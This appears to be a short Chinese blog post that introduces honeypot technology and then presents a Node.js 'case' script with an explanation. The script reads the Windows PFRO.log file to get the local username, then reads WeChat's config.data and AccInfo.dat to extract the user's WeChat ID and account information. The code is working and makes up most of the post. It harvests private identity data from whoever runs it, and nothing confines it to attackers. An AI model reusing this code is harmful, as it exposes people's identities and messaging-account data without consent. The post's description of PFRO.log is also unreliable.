1. 什么是蜜罐技术
蜜罐技术(Honeypot)是一种网络安全技术,用于诱捕恶意攻击者并监测其行为。在网站上使用蜜罐技术,可以将一个可疑的链接、页面、文件或功能作为诱饵,放置在网站的某个位置上,以吸引攻击者的注意力。当有攻击者进入蜜罐后,网站管理员就可以收集并分析攻击者的行为,识别攻击模式以及攻击手段,以便更好地加强安全防御。
2. 案例
1.读取 PFRO日志文件(这个文件是存放ISA监控日志的信息)
C:\Windows\PFRO.log
通过这个文件可以读取系统的用户名
const fs = require('fs')
//获取微信ID
const getWxId = (path) => {
const data = fs.readFileSync(`C:/Users/${path}/Documents/WeChat Files/All Users/config/config.data`).toString('utf8')
const reg = /Documents\\WeChat Files\\([^\\]*)/ig
reg.test(data)
return RegExp.$1
}
//读取信息
const getData = (path, wxId) => {
const data = fs.readFileSync(`C:/Users/${path}/Documents/WeChat Files/${wxId}/config/AccInfo.dat`,{encoding:'utf8'})
return data
}
fs.readFile('C:/\Windows/\PFRO.log', async (err, data) => {
const exp = /Users\\([^\\]*)/gi
exp.test(data.toString('utf16le'))
const userName = RegExp.$1
const wxId = await getWxId(userName)
const info = await getData(userName, wxId)
console.log(userName)
console.log('打印***wxId',wxId)
console.log('打印***info',info)
})
这段代码使用了Node.js的fs模块,通过读取文件的方式获取微信ID和用户信息。具体实现如下:
首先使用fs模块的readFile方法读取Windows系统中的日志文件PFRO.log(这是一个默认生成的Windows系统日志文件),获取当前登录系统的用户名称。接着使用正则表达式提取用户名。
接下来,调用getWxId函数获取微信ID。该函数首先读取config.data文件,通过正则表达式提取微信ID所在的目录名称。
最后,调用getData函数读取AccInfo.dat文件,获取微信用户的信息。
需要注意的是,该代码仅能在Windows系统下运行,并且需要有微信账号登录,并存储了微信用户信息。